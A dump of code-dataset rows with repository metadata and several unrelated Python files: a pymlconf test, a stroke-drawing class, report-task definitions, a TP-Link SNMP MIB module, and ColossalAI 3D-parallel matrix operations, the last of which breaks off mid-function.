] | 36 | 2015-02-09T14:20:32.000Z | 2020-12-18T03:01:29.000Z | tests/test_delattribute.py | pylover/pymlconf | 4111ed84b23201957ee789b58e6818f330eeb28b | [
"MIT"
] | 23 | 2015-06-05T07:30:18.000Z | 2020-05-26T17:45:46.000Z | tests/test_delattribute.py | pylover/pymlconf | 4111ed84b23201957ee789b58e6818f330eeb28b | [
"MIT"
] | 5 | 2016-02-19T14:22:28.000Z | 2018-08-06T14:04:44.000Z | import pytest
from pymlconf import Root
def test_delattribute():
root = Root('''
app:
name: MyApp
''')
assert hasattr(root.app, 'name')
del root.app.name
assert not hasattr(root.app, 'name')
with pytest.raises(AttributeError):
del root.app.invalidattribute
| 17.333333 | 40 | 0.625 | 37 | 312 | 5.243243 | 0.513514 | 0.180412 | 0.226804 | 0.185567 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.266026 | 312 | 17 | 41 | 18.352941 | 0.847162 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0.083333 | false | 0 | 0.166667 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
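Supporting `del root.app.name` the way this test expects requires a `__delattr__` that falls through to the backing store and raises `AttributeError` for unknown keys. A minimal dictionary-backed sketch of that mechanism (a toy, not pymlconf's actual implementation) looks like this:

```python
class Node:
    """Attribute-style access over a plain dict, including deletion."""
    def __init__(self, **data):
        object.__setattr__(self, "_data", dict(data))

    def __getattr__(self, name):
        try:
            return self._data[name]
        except KeyError:
            raise AttributeError(name)

    def __setattr__(self, name, value):
        self._data[name] = value

    def __delattr__(self, name):
        try:
            del self._data[name]
        except KeyError:
            raise AttributeError(name)

app = Node(name="MyApp")
assert app.name == "MyApp"
del app.name
assert not hasattr(app, "name")
```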
f80e14d31ba59b5772064b17b1e2d0d9764b5671 | 2,022 | py | Python | src/xie/graphics/stroke.py | xrloong/Xie | c45c454b4467d91e242a84fda665b67bd3d43ca9 | [
"Apache-2.0"
] | null | null | null | src/xie/graphics/stroke.py | xrloong/Xie | c45c454b4467d91e242a84fda665b67bd3d43ca9 | [
"Apache-2.0"
] | null | null | null | src/xie/graphics/stroke.py | xrloong/Xie | c45c454b4467d91e242a84fda665b67bd3d43ca9 | [
"Apache-2.0"
] | null | null | null | from .shape import Shape, Pane
from .stroke_path import StrokePath
from . import DrawingSystem
class StrokePosition:
def __init__(self, startPoint, statePane: Pane = None):
self.startPoint = startPoint
self.statePane = statePane
def transform(self, fromPane, toPane):
newStatePane = fromPane.transformRelativePaneByTargetPane(self.statePane, toPane)
newStartPoint = fromPane.transformRelativePointByTargetPane(self.startPoint, toPane)
return StrokePosition(newStartPoint, newStatePane)
class Stroke(Shape):
def __init__(self, typeName, path: StrokePath, strokePosition: StrokePosition):
self.typeName = typeName
self.path = path
self.strokePosition = strokePosition
def getStartPoint(self):
return self.strokePosition.startPoint
def getTypeName(self):
return self.typeName
def getName(self):
return self.getTypeName()
def getStrokePath(self):
return self.path
def getInfoPane(self):
return self.path.getPane()
def getStatePane(self):
return self.strokePosition.statePane
def draw(self, drawingSystem: DrawingSystem):
startPoint = self.getStartPoint()
stroke=self
drawingSystem.onPreDrawStroke(stroke)
drawingSystem.save()
infoPane = stroke.getInfoPane()
statePane = stroke.getStatePane()
drawingSystem.translate(-startPoint[0], -startPoint[1])
drawingSystem.translate(-infoPane.centerX, -infoPane.centerY)
if infoPane.width != 0:
drawingSystem.scale(statePane.width/infoPane.width, 1)
if infoPane.height != 0:
drawingSystem.scale(1, statePane.height/infoPane.height)
drawingSystem.translate(statePane.centerX, statePane.centerY)
drawingSystem.startDrawing()
drawingSystem.moveTo(startPoint)
drawingSystem.draw(stroke.getStrokePath())
drawingSystem.endDrawing()
drawingSystem.restore()
drawingSystem.onPostDrawStroke(stroke)
def transform(self, fromComponentPane, toComponentPane):
strokePosition = self.strokePosition.transform(fromComponentPane, toComponentPane)
return Stroke(self.typeName, self.path, strokePosition)
| 28.478873 | 86 | 0.786845 | 203 | 2,022 | 7.793103 | 0.256158 | 0.037927 | 0.053097 | 0.035398 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003365 | 0.1182 | 2,022 | 70 | 87 | 28.885714 | 0.883904 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.215686 | false | 0 | 0.058824 | 0.117647 | 0.470588 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
f81e877f703a45f50e56f90f169d90c0d93ffb11 | 7,065 | py | Python | tasks/tasks_fetch_entity.py | xyla-io/almacen | 7b7f235dc7939777f971f1b5eadd5621e980c15e | [
"MIT"
] | 2 | 2020-10-15T22:12:17.000Z | 2020-10-26T07:17:17.000Z | tasks/tasks_fetch_entity.py | xyla-io/almacen | 7b7f235dc7939777f971f1b5eadd5621e980c15e | [
"MIT"
] | null | null | null | tasks/tasks_fetch_entity.py | xyla-io/almacen | 7b7f235dc7939777f971f1b5eadd5621e980c15e | [
"MIT"
] | null | null | null | import models
import re
from . import base
from . import tasks_fetch_currency_exchange
from abc import abstractproperty
from typing import TypeVar, List, Optional
class ParseTagsMutationSpecifier:
parser: Optional[str]
channel: str
entity: str
id_column: str
name_column: str
@classmethod
def task_parser_name(cls, task: base.ReportTask, default_name: Optional[str]=None) -> Optional[str]:
if 'task_tag_parsers' in task.task_set.config and task.task_type.value in task.task_set.config['task_tag_parsers']:
return task.task_set.config['task_tag_parsers'][task.task_type.value]
if default_name is not None:
return default_name
match = re.match(r'^fetch_(.+)s$', task.task_type.value)
if not match:
return None
parts = match.group(1).rpartition('_')
name = '-'.join([parts[0], parts[2]])
return name
def __init__(self, parser: Optional[str], channel: str, entity: str, name_column: str, id_column: str):
self.parser = parser
self.channel = channel
self.entity = entity
self.id_column = id_column
self.name_column = name_column
class LatestValueMutationSpecifier:
identifier_column: str
source_value_column: str
target_value_column: str
only_missing_values: List[any]
def __init__(self, identifier_column: str, source_value_column: str, target_value_column: str, only_missing_values: List[any]=[]):
self.identifier_column = identifier_column
self.source_value_column = source_value_column
self.target_value_column = target_value_column
self.only_missing_values = only_missing_values
class FetchSpendableReportTask(base.FetchReportTask):
@abstractproperty
def fetched_currency_column(self) -> str:
pass
@abstractproperty
def money_columns(self) -> List[str]:
pass
@property
def currency(self) -> str:
return self.task_set.company_metadata.currency
def generate_behaviors(self) -> List[models.ReportTaskBehavior]:
return [
models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.mutate,
behavior_subtype=models.ReportTaskBehaviorSubType.mutate_currency_exchange
),
]
def generate_subtasks(self) -> List[TypeVar('ReportTask')]:
if 'currency_exchange' not in self.task_set.config:
return []
return [
tasks_fetch_currency_exchange.FetchCurrencyExchangeReportTask(
task_set=self.task_set,
identifier_prefix=self.identifier
)
]
class FetchCampaignReportTask(FetchSpendableReportTask):
@abstractproperty
def latest_value_mutation_specifiers(self) -> List[LatestValueMutationSpecifier]:
pass
@property
def parse_tags_mutation_specifier(self) -> Optional[ParseTagsMutationSpecifier]:
return None
def generate_behaviors(self) -> List[models.ReportTaskBehavior]:
return [
models.ReportTaskBehavior(models.ReportTaskBehaviorType.run_subtasks),
models.ReportTaskBehavior(models.ReportTaskBehaviorType.fetch_date),
models.ReportTaskBehavior(models.ReportTaskBehaviorType.provide_credentials),
models.ReportTaskBehavior(models.ReportTaskBehaviorType.provide_api),
models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.verify,
behavior_subtype=models.ReportTaskBehaviorSubType.before
),
models.ReportTaskBehavior(models.ReportTaskBehaviorType.fetch_report),
models.ReportTaskBehavior(models.ReportTaskBehaviorType.process),
models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.process,
behavior_subtype=models.ReportTaskBehaviorSubType.edit
),
models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.mutate,
behavior_subtype=models.ReportTaskBehaviorSubType.replace
),
models.ReportTaskBehavior(models.ReportTaskBehaviorType.collect),
models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.mutate,
behavior_subtype=models.ReportTaskBehaviorSubType.mutate_currency_exchange
),
*[
models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.mutate,
behavior_subtype=models.ReportTaskBehaviorSubType.mutate_latest_column_value,
behavior_subtype_info=s
)
for s in self.latest_value_mutation_specifiers
],
*([models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.mutate,
behavior_subtype=models.ReportTaskBehaviorSubType.mutate_parse_tags,
behavior_subtype_info=self.parse_tags_mutation_specifier
)] if self.parse_tags_mutation_specifier else []),
models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.verify,
behavior_subtype=models.ReportTaskBehaviorSubType.after
),
]
class FetchAdReportTask(FetchCampaignReportTask):
@abstractproperty
def ad_name_column(self) -> str:
pass
@abstractproperty
def ad_id_column(self) -> str:
pass
def generate_behaviors(self) -> List[models.ReportTaskBehavior]:
return [
models.ReportTaskBehavior(models.ReportTaskBehaviorType.run_subtasks),
models.ReportTaskBehavior(models.ReportTaskBehaviorType.fetch_date),
models.ReportTaskBehavior(models.ReportTaskBehaviorType.provide_credentials),
models.ReportTaskBehavior(models.ReportTaskBehaviorType.provide_api),
models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.verify,
behavior_subtype=models.ReportTaskBehaviorSubType.before
),
models.ReportTaskBehavior(models.ReportTaskBehaviorType.fetch_report),
models.ReportTaskBehavior(models.ReportTaskBehaviorType.process),
models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.process,
behavior_subtype=models.ReportTaskBehaviorSubType.edit
),
models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.mutate,
behavior_subtype=models.ReportTaskBehaviorSubType.replace
),
models.ReportTaskBehavior(models.ReportTaskBehaviorType.collect),
models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.mutate,
behavior_subtype=models.ReportTaskBehaviorSubType.mutate_currency_exchange
),
*[
models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.mutate,
behavior_subtype=models.ReportTaskBehaviorSubType.mutate_latest_column_value,
behavior_subtype_info=s
)
for s in self.latest_value_mutation_specifiers
],
*([models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.mutate,
behavior_subtype=models.ReportTaskBehaviorSubType.mutate_parse_tags,
behavior_subtype_info=self.parse_tags_mutation_specifier
)] if self.parse_tags_mutation_specifier else []),
models.ReportTaskBehavior(
behavior_type=models.ReportTaskBehaviorType.verify,
behavior_subtype=models.ReportTaskBehaviorSubType.after
),
] | 38.606557 | 132 | 0.754706 | 684 | 7,065 | 7.539474 | 0.157895 | 0.148924 | 0.093077 | 0.104712 | 0.716502 | 0.705061 | 0.691099 | 0.665115 | 0.665115 | 0.665115 | 0 | 0.00051 | 0.167587 | 7,065 | 183 | 133 | 38.606557 | 0.876382 | 0 | 0 | 0.620482 | 0 | 0 | 0.012737 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.084337 | false | 0.03012 | 0.036145 | 0.03012 | 0.271084 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f81f6b88dfb0bfa0ed2fc6759e1859cc964832d9 | 2,901 | py | Python | pysnmp-with-texts/TPLINK-CLUSTER-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/TPLINK-CLUSTER-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/TPLINK-CLUSTER-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module TPLINK-CLUSTER-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/TPLINK-CLUSTER-MIB
# Produced by pysmi-0.3.4 at Wed May 1 15:24:19 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ConstraintsIntersection, ConstraintsUnion, SingleValueConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ConstraintsIntersection", "ConstraintsUnion", "SingleValueConstraint", "ValueRangeConstraint")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
ModuleIdentity, Unsigned32, Counter32, MibIdentifier, iso, ObjectIdentity, NotificationType, Gauge32, MibScalar, MibTable, MibTableRow, MibTableColumn, IpAddress, Counter64, Bits, Integer32, TimeTicks = mibBuilder.importSymbols("SNMPv2-SMI", "ModuleIdentity", "Unsigned32", "Counter32", "MibIdentifier", "iso", "ObjectIdentity", "NotificationType", "Gauge32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "IpAddress", "Counter64", "Bits", "Integer32", "TimeTicks")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
tplinkClusterMIBObjects, = mibBuilder.importSymbols("TPLINK-CLUSTERTREE-MIB", "tplinkClusterMIBObjects")
tplinkClusterMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 11863, 6, 33, 1, 1))
tplinkClusterMIB.setRevisions(('2009-08-27 00:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    if mibBuilder.loadTexts: tplinkClusterMIB.setRevisionsDescriptions(('Initial version of this MIB module.',))
if mibBuilder.loadTexts: tplinkClusterMIB.setLastUpdated('200908270000Z')
if mibBuilder.loadTexts: tplinkClusterMIB.setOrganization('TPLINK')
if mibBuilder.loadTexts: tplinkClusterMIB.setContactInfo('www.tplink.com.cn')
if mibBuilder.loadTexts: tplinkClusterMIB.setDescription('The Cluster Management function enables a network administrator to manage the scattered devices in the network via a management device. After a commander switch is configured, management and maintenance operations intended for the member devices in a cluster are implemented by the commander device. ')
ndpManage = MibIdentifier((1, 3, 6, 1, 4, 1, 11863, 6, 33, 1, 1, 1))
ntdpManage = MibIdentifier((1, 3, 6, 1, 4, 1, 11863, 6, 33, 1, 1, 2))
clusterManage = MibIdentifier((1, 3, 6, 1, 4, 1, 11863, 6, 33, 1, 1, 3))
mibBuilder.exportSymbols("TPLINK-CLUSTER-MIB", clusterManage=clusterManage, tplinkClusterMIB=tplinkClusterMIB, ndpManage=ndpManage, ntdpManage=ntdpManage, PYSNMP_MODULE_ID=tplinkClusterMIB)
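The identifiers defined above (`tplinkClusterMIB`, `ndpManage`, and so on) are plain tuples of OID sub-identifiers. As a quick illustration, a small helper (ours, not part of pysnmp) renders them in the dotted-decimal form SNMP tools expect:

```python
def oid_to_str(oid):
    """Render an OID tuple as dotted-decimal text."""
    return '.'.join(str(sub) for sub in oid)

# Same tuples as in the module above
tplink_cluster_mib = (1, 3, 6, 1, 4, 1, 11863, 6, 33, 1, 1)
ndp_manage = tplink_cluster_mib + (1,)  # ndpManage is a child node

print(oid_to_str(tplink_cluster_mib))  # 1.3.6.1.4.1.11863.6.33.1.1
print(oid_to_str(ndp_manage))          # 1.3.6.1.4.1.11863.6.33.1.1.1
```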
| 103.607143 | 477 | 0.783178 | 324 | 2,901 | 7.006173 | 0.438272 | 0.070925 | 0.046256 | 0.081498 | 0.280617 | 0.193392 | 0.193392 | 0.193392 | 0.193392 | 0.193392 | 0 | 0.062524 | 0.090314 | 2,901 | 27 | 478 | 107.444444 | 0.797651 | 0.113754 | 0 | 0 | 0 | 0.052632 | 0.346995 | 0.034738 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.368421 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
f8287f932ae9368561250875bb2b9820c5a3ddda | 23,025 | py | Python | colossalai/nn/layer/parallel_3d/_operation.py | DevinCheung/ColossalAI | 632e622de818697f9949e35117c0432d88f62c87 | [
"Apache-2.0"
] | null | null | null | colossalai/nn/layer/parallel_3d/_operation.py | DevinCheung/ColossalAI | 632e622de818697f9949e35117c0432d88f62c87 | [
"Apache-2.0"
] | null | null | null | colossalai/nn/layer/parallel_3d/_operation.py | DevinCheung/ColossalAI | 632e622de818697f9949e35117c0432d88f62c87 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
from typing import Any, Optional, Tuple
import torch
import torch.distributed as dist
from colossalai.communication import all_gather, all_reduce, reduce_scatter
from colossalai.context.parallel_mode import ParallelMode
from colossalai.core import global_context as gpc
from torch import Tensor
from torch.cuda.amp import custom_bwd, custom_fwd
class linear_3d(torch.autograd.Function):
@staticmethod
@custom_fwd(cast_inputs=torch.float16)
def forward(ctx: Any,
input_: Tensor,
weight: Tensor,
bias: Optional[Tensor],
input_parallel_mode: ParallelMode,
weight_parallel_mode: ParallelMode,
output_parallel_mode: ParallelMode,
input_dim: int = 0,
weight_dim: int = -1,
output_dim: int = 0) -> Tensor:
assert input_.shape[-1] == weight.shape[0], \
'Invalid shapes: input = {}, weight = {}.'.format(input_.shape, weight.shape)
ctx.use_bias = bias is not None
input_ = all_gather(input_, input_dim, input_parallel_mode)
input_ = torch.cat(input_, dim=input_dim)
# weight = all_gather(weight, weight_dim, weight_parallel_mode)
ctx.save_for_backward(input_, weight)
output = torch.matmul(input_, weight)
output = reduce_scatter(output, output_dim, output_parallel_mode)
if bias is not None:
output += bias
ctx.input_parallel_mode = input_parallel_mode
ctx.weight_parallel_mode = weight_parallel_mode
ctx.output_parallel_mode = output_parallel_mode
ctx.input_dim = input_dim
ctx.weight_dim = weight_dim
ctx.output_dim = output_dim
return output
@staticmethod
@custom_bwd
def backward(ctx: Any, output_grad: Tensor) -> Tuple[Tensor, ...]:
input_, weight = ctx.saved_tensors
with torch.no_grad():
output_grad = all_gather(output_grad, ctx.output_dim,
ctx.output_parallel_mode)
output_grad = torch.cat(output_grad, dim=ctx.output_dim)
input_grad = torch.matmul(output_grad, weight.transpose(0, 1))
input_grad, input_op = reduce_scatter(input_grad, ctx.input_dim,
ctx.input_parallel_mode,
async_op=True)
weight_grad = torch.matmul(
input_.reshape(-1, input_.shape[-1]).transpose(0, 1),
output_grad.reshape(-1, output_grad.shape[-1]))
            bias_grad = None  # default, so the return below is defined when no bias is used
            if ctx.use_bias:
bias_grad = torch.sum(output_grad,
dim=tuple(
range(len(output_grad.shape))[:-1]))
weight_grad = torch.cat([weight_grad, torch.unsqueeze(bias_grad, dim=0)])
weight_grad, weight_op = all_reduce(weight_grad, ctx.weight_parallel_mode, async_op=True)
input_op.wait()
weight_op.wait()
if ctx.use_bias:
bias_grad = weight_grad[-1]
weight_grad = weight_grad[:-1]
return input_grad, weight_grad, bias_grad, None, None, None, None, None, None
class layer_norm_3d(torch.autograd.Function):
@staticmethod
@custom_fwd(cast_inputs=torch.float16)
def forward(ctx: Any, input_: Tensor, weight: Tensor, bias: Tensor,
normalized_shape: int, eps: float,
input_parallel_mode: ParallelMode,
weight_parallel_mode: ParallelMode,
output_parallel_mode: ParallelMode) -> Tensor:
mean = all_reduce(torch.sum(input_, dim=-1, keepdim=True),
output_parallel_mode) / normalized_shape
mu = input_ - mean
var = all_reduce(torch.sum(mu**2, dim=-1, keepdim=True),
output_parallel_mode) / normalized_shape
sigma = torch.sqrt(var + eps)
ctx.save_for_backward(mu, sigma, weight)
z = mu / sigma
output = weight * z + bias
ctx.normalized_shape = normalized_shape
ctx.input_parallel_mode = input_parallel_mode
ctx.weight_parallel_mode = weight_parallel_mode
ctx.output_parallel_mode = output_parallel_mode
return output
@staticmethod
@custom_bwd
def backward(ctx: Any, output_grad: Tensor) -> Tuple[Tensor, ...]:
mu, sigma, weight = ctx.saved_tensors
with torch.no_grad():
bias_grad, weight_grad = output_grad, output_grad * mu / sigma
grads = torch.stack([bias_grad, weight_grad]).contiguous()
grads = torch.sum(grads, dim=tuple(range(len(grads.shape))[1:-1]))
grads = all_reduce(grads, ctx.weight_parallel_mode)
grads = all_reduce(grads, ctx.input_parallel_mode)
bias_grad, weight_grad = grads[0], grads[1]
dz = output_grad * weight
dvar = dz * mu * (-0.5) * sigma**(-3)
dvar = all_reduce(torch.sum(dvar, dim=-1, keepdim=True), ctx.output_parallel_mode)
dmean = dz * (-1 / sigma) + dvar * -2 * mu / ctx.normalized_shape
dmean = all_reduce(torch.sum(dmean, dim=-1, keepdim=True), ctx.output_parallel_mode)
input_grad = dz / sigma + dvar * 2 * mu / ctx.normalized_shape + dmean / ctx.normalized_shape
return input_grad, weight_grad, bias_grad, None, None, None, None, None
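The backward pass above is the standard layer-norm input gradient, with per-row sums replaced by `all_reduce` across the output-parallel group. A single-process, pure-Python sketch of the same three-term formula (`dz`, `dvar`, `dmean`), checked against a central finite difference — names are ours, not ColossalAI API, and collectives are replaced by local sums:

```python
import math

def layer_norm(x, w, b, eps=1e-5):
    """Forward pass on a single row (the collectives reduce to plain sums)."""
    n = len(x)
    mean = sum(x) / n
    mu = [v - mean for v in x]
    sigma = math.sqrt(sum(m * m for m in mu) / n + eps)
    return [w[i] * mu[i] / sigma + b[i] for i in range(n)]

def layer_norm_input_grad(x, w, g, eps=1e-5):
    """Mirrors backward(): dz, reduced dvar and dmean, then the 3-term gradient."""
    n = len(x)
    mean = sum(x) / n
    mu = [v - mean for v in x]
    sigma = math.sqrt(sum(m * m for m in mu) / n + eps)
    dz = [g[i] * w[i] for i in range(n)]
    dvar = -0.5 * sigma ** -3 * sum(dz[i] * mu[i] for i in range(n))
    dmean = sum(-dz[i] / sigma - 2.0 * dvar * mu[i] / n for i in range(n))
    return [dz[i] / sigma + 2.0 * dvar * mu[i] / n + dmean / n for i in range(n)]

x = [0.5, -1.2, 2.0, 0.1]
w = [1.0, 0.5, -0.3, 2.0]
b = [0.0, 0.0, 0.0, 0.0]
g = [0.2, -0.4, 1.0, 0.3]

analytic = layer_norm_input_grad(x, w, g)
h = 1e-6
for j in range(len(x)):
    xp = list(x); xp[j] += h
    xm = list(x); xm[j] -= h
    lp = sum(gi * yi for gi, yi in zip(g, layer_norm(xp, w, b)))
    lm = sum(gi * yi for gi, yi in zip(g, layer_norm(xm, w, b)))
    numeric = (lp - lm) / (2 * h)
    assert abs(numeric - analytic[j]) < 1e-4  # analytic gradient matches
```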
class Matmul_AB_3D(torch.autograd.Function):
"""Matrix multiplication for :math:`C = AB`
"""
@staticmethod
@custom_fwd(cast_inputs=torch.float16)
def forward(ctx: Any,
A: Tensor,
B: Tensor,
depth: int,
input_parallel_mode: ParallelMode,
weight_parallel_mode: ParallelMode,
output_parallel_mode: ParallelMode,
input_dim: int = 0,
weight_dim: int = -1,
output_dim: int = 0) -> Tensor:
# A: [m/q^2, n, k/q]
# B: [k/q, h/q^2]
# C: [m/q^2, n, h/q]
ctx.save_for_backward(A, B)
assert A.shape[-1] == B.shape[0], \
'Invalid shapes: A={}, B={}.'.format(A.shape, B.shape)
A_temp = all_gather(A, input_dim, input_parallel_mode)
B_temp = all_gather(B, weight_dim, weight_parallel_mode)
C = torch.matmul(A_temp, B_temp)
out = reduce_scatter(C, output_dim, output_parallel_mode)
ctx.depth = depth
ctx.A_group_parallel_mode = input_parallel_mode
ctx.B_group_parallel_mode = weight_parallel_mode
ctx.C_group_parallel_mode = output_parallel_mode
ctx.A_dim = input_dim
ctx.B_dim = weight_dim
ctx.C_dim = output_dim
return out
@staticmethod
@custom_bwd
def backward(ctx: Any, output_grad: Tensor) -> Tuple[Tensor, ...]:
A, B = ctx.saved_tensors
with torch.no_grad():
A_grad = Matmul_ABT_3D.apply(output_grad, B, ctx.depth,
ctx.C_group_parallel_mode,
ctx.B_group_parallel_mode,
ctx.A_group_parallel_mode, ctx.C_dim,
ctx.B_dim, ctx.A_dim)
B_grad = Matmul_ATB_3D.apply(A, output_grad, ctx.depth,
ctx.A_group_parallel_mode,
ctx.C_group_parallel_mode,
ctx.B_group_parallel_mode, ctx.A_dim,
ctx.C_dim, ctx.B_dim)
return A_grad, B_grad, None, None, None, None, None, None, None
class Matmul_ABT_3D(torch.autograd.Function):
"""Matrix multiplication for :math:`C = AB^T`
"""
@staticmethod
@custom_fwd(cast_inputs=torch.float16)
def forward(ctx: Any,
A: Tensor,
B: Tensor,
depth: int,
input_parallel_mode: ParallelMode,
weight_parallel_mode: ParallelMode,
output_parallel_mode: ParallelMode,
input_dim: int = 0,
weight_dim: int = -1,
output_dim: int = 0) -> Tensor:
# A: [m/q^2, n, h/q]
# B: [k/q, h/q^2]
# C: [m/q^2, n, k/q]
ctx.save_for_backward(A, B)
A_temp = all_gather(A, input_dim, input_parallel_mode)
B_temp = all_gather(B, weight_dim, weight_parallel_mode)
C = torch.matmul(A_temp, B_temp.transpose(0, 1))
out = reduce_scatter(C, output_dim, output_parallel_mode)
ctx.depth = depth
ctx.A_group_parallel_mode = input_parallel_mode
ctx.B_group_parallel_mode = weight_parallel_mode
ctx.C_group_parallel_mode = output_parallel_mode
ctx.A_dim = input_dim
ctx.B_dim = weight_dim
ctx.C_dim = output_dim
return out
@staticmethod
@custom_bwd
def backward(ctx: Any, output_grad: Tensor) -> Tuple[Tensor, ...]:
A, B = ctx.saved_tensors
with torch.no_grad():
A_grad = Matmul_AB_3D.apply(output_grad, B, ctx.depth,
ctx.C_group_parallel_mode,
ctx.B_group_parallel_mode,
ctx.A_group_parallel_mode, ctx.C_dim,
ctx.B_dim, ctx.A_dim)
B_grad = Matmul_ATB_3D.apply(output_grad, A, ctx.depth,
ctx.C_group_parallel_mode,
ctx.A_group_parallel_mode,
ctx.B_group_parallel_mode, ctx.C_dim,
ctx.A_dim, ctx.B_dim)
return A_grad, B_grad, None, None, None, None, None, None, None
class Matmul_ATB_3D(torch.autograd.Function):
"""Matrix multiplication for :math:`C = A^TB`
"""
@staticmethod
@custom_fwd(cast_inputs=torch.float16)
def forward(ctx: Any,
A: Tensor,
B: Tensor,
depth: int,
input_parallel_mode: ParallelMode,
weight_parallel_mode: ParallelMode,
output_parallel_mode: ParallelMode,
input_dim: int = 0,
weight_dim: int = 0,
output_dim: int = -1) -> Tensor:
# A: [m/q^2, n, k/q]
# B: [m/q^2, n, h/q]
# C: [k/q, h/q^2]
ctx.save_for_backward(A, B)
A_temp = all_gather(A, input_dim, input_parallel_mode)
A_temp = A_temp.reshape(-1, A.shape[-1])
B_temp = all_gather(B, weight_dim, weight_parallel_mode)
B_temp = B_temp.reshape(-1, B.shape[-1])
C = torch.matmul(A_temp.transpose(0, 1), B_temp)
out = reduce_scatter(C, output_dim, output_parallel_mode)
ctx.depth = depth
ctx.A_group_parallel_mode = input_parallel_mode
ctx.B_group_parallel_mode = weight_parallel_mode
ctx.C_group_parallel_mode = output_parallel_mode
ctx.A_dim = input_dim
ctx.B_dim = weight_dim
ctx.C_dim = output_dim
return out
@staticmethod
@custom_bwd
def backward(ctx: Any, output_grad: Tensor) -> Tuple[Tensor, ...]:
A, B = ctx.saved_tensors
with torch.no_grad():
A_grad = Matmul_ABT_3D.apply(B, output_grad, ctx.depth,
ctx.B_group_parallel_mode,
ctx.C_group_parallel_mode,
ctx.A_group_parallel_mode, ctx.B_dim,
ctx.C_dim, ctx.A_dim)
B_grad = Matmul_AB_3D.apply(A, output_grad, ctx.depth,
ctx.A_group_parallel_mode,
ctx.C_group_parallel_mode,
ctx.B_group_parallel_mode, ctx.A_dim,
ctx.C_dim, ctx.B_dim)
return A_grad, B_grad, None, None, None, None, None, None, None
class Add_3D(torch.autograd.Function):
"""Matrix add bias: :math:`C = A + b`
"""
@staticmethod
@custom_fwd(cast_inputs=torch.float16)
def forward(ctx: Any, input_: Tensor, bias: Tensor, depth: int,
input_parallel_mode: ParallelMode,
weight_parallel_mode: ParallelMode,
output_parallel_mode: ParallelMode) -> Tensor:
# input: [m/q^2, n, h/q]
# bias: [h/q^2]
ranks_in_group = gpc.get_ranks_in_group(input_parallel_mode)
